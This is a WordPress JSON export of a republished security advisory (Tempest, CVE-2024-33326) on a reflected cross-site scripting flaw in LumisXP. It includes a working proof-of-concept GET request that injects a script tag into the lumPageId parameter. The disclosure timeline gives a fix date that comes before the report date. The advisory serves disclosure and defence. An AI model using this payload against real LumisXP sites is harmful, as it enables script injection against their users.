{"id":58134,"date":"2024-07-11T18:10:02","date_gmt":"2024-07-11T15:10:02","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/179506\/TSI-ADV062024-CVE-2024-33326.txt"},"modified":"2024-07-11T18:10:02","modified_gmt":"2024-07-11T15:10:02","slug":"lumisxp-16-1-x-cross-site-scripting","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/lumisxp-16-1-x-cross-site-scripting\/","title":{"rendered":"LumisXP 16.1.x Cross Site Scripting"},"content":{"rendered":"<p>=====[ Tempest Security Intelligence &#8211; ADV-6\/2024<br \/>]==========================<\/p>\n<p>LumisXP v15.0.x to v16.1.x<\/p>\n<p>Author: Rodolfo Tavares<\/p>\n<p>Tempest Security Intelligence &#8211; Recife, Pernambuco &#8211; Brazil<\/p>\n<p>=====[ Table of Contents]==================================================<br \/>* Overview<br \/>* Detailed description<br \/>* Timeline of disclosure<br \/>* Thanks &amp; Acknowledgements<br \/>* References<\/p>\n<p>=====[ Vulnerability<br \/>Information]=============================================<br \/>* Class: Improper Neutralization of Input During Web Page Generation<br \/>(&#8216;Cross-site Scripting&#8217;)<br \/>(&#8216;Improper Neutralization of Input During Web Page Generation (&#8216;Cross-site<br \/>Scripting&#8217;)&#8217;) [CWE-79]\n<p>* CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:R\/S:U\/C:L\/I:L\/A:N &#8211; 5.4<\/p>\n<p>=====[ Overview]========================================================<br \/>* System affected : LumisXP<br \/>* Software Version : Version &#8211; v15.0.x to v16.1.x<br \/>* Impacts :<br \/>* Vulnerability: A cross-site scripting (XSS) vulnerability in the<br \/>component XsltResultControllerHtml.jsp of Lumisxp v15.0.x to v16.1.x allows<br \/>attackers to execute arbitrary web scripts or HTML via a crafted payload<br \/>injected into the lumPageID parameter<\/p>\n<p>=====[ Detailed<br \/>description]=================================================<br \/>* XSS [GET<br \/>\/portal\/XsltResultControllerHtml.jsp?xslContent=&amp;interfaceInstanceId=&amp;lumPageId=%3cscript%3econfirm(1)%3c%2fscript%3e&amp;xslContentFilePath=]:<\/p>\n<p>1 &#8211; Send the link by inserting the XSS payload into the lumPageID=<br \/>parameter.<\/p>\n<p>&#8220;`<br \/>GET<br \/>\/portal\/XsltResultControllerHtml.jsp?xslContent=&amp;interfaceInstanceId=&amp;lumPageId=%3cscript%3econfirm(1)%3c%2fscript%3e&amp;xslContentFilePath=<br \/>&#8220;`<br \/>2 &#8211; Verify that in the response your payload will be executed.<\/p>\n<p>=====[ Timeline of<br \/>disclosure]===============================================<\/p>\n<p>2\/Apr\/2024 &#8211; Responsible disclosure was initiated with the vendor.<br \/>12\/Apr\/2024 &#8211; LumisXP Support confirmed the issue;<br \/>16\/Fev\/2024 &#8211; The vendor fixed the vulnerability<br \/>29\/May\/2024 &#8211; CVEs was assigned and reserved as CVE-2024-33326<\/p>\n<p>=====[ Thanks &amp; Acknowledgements]========================================<br \/>* Tempest Security Intelligence [1]* Rodolfo Tavares<br \/>* Niklas Correa<\/p>\n<p>=====[ References ]=====================================================<\/p>\n[1][ [https:\/\/cwe.mitre.org\/data\/definitions\/79.html][2][ [https:\/\/www.tempest.com.br|https:\/\/www.tempest.com.br\/]][3][Thanks Filipe X.]\n<p>=====[ EOF ]===========================================================<br \/>&#8212;<\/p>\n<p>&#8212; <\/p>\n<p>*Esta mensagem \u00e9 para uso exclusivo de seu destinat\u00e1rio e pode conter <br \/>informa\u00e7\u00f5es privilegiadas e confidenciais. Todas as informa\u00e7\u00f5es aqui <br \/>contidas devem ser tratadas como confidenciais e n\u00e3o devem ser divulgadas a <br \/>terceiros sem o pr\u00e9vio consentimento por escrito da Tempest. Se voc\u00ea n\u00e3o \u00e9 <br \/>o destinat\u00e1rio n\u00e3o deve distribuir, copiar ou arquivar a mensagem. Neste <br \/>caso, por favor, notifique o remetente da mesma e destrua imediatamente a <br \/>mensagem.*<\/p>\n<p>*<br \/>*<br \/>*This message is intended solely for the use of its <br \/>addressee and may contain privileged or confidential information. All <br \/>information contained herein shall be treated as confidential and shall not <br \/>be disclosed to any third party without Tempest\u2019s prior written approval. <br \/>If you are not the addressee you should not distribute, copy or file this <br \/>message. In this case, please notify the sender and destroy its contents <br \/>immediately.**<br \/>*<br \/>*<br \/>*<\/p>\n","protected":false},"excerpt":{"rendered":"<p>=====[ Tempest Security Intelligence &#8211; ADV-6\/2024]========================== LumisXP v15.0.x to v16.1.x Author: Rodolfo Tavares Tempest Security Intelligence &#8211; Recife, Pernambuco &#8211; Brazil =====[ Table of Contents]==================================================* Overview* Detailed description* Timeline of disclosure* Thanks &amp; Acknowledgements* References =====[ VulnerabilityInformation]=============================================* Class: Improper Neutralization of Input During Web Page Generation(&#8216;Cross-site Scripting&#8217;)(&#8216;Improper Neutralization of Input During Web Page Generation (&#8216;Cross-siteScripting&#8217;)&#8217;) &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-58134","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/58134","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=58134"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/58134\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=58134"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=58134"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=58134"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}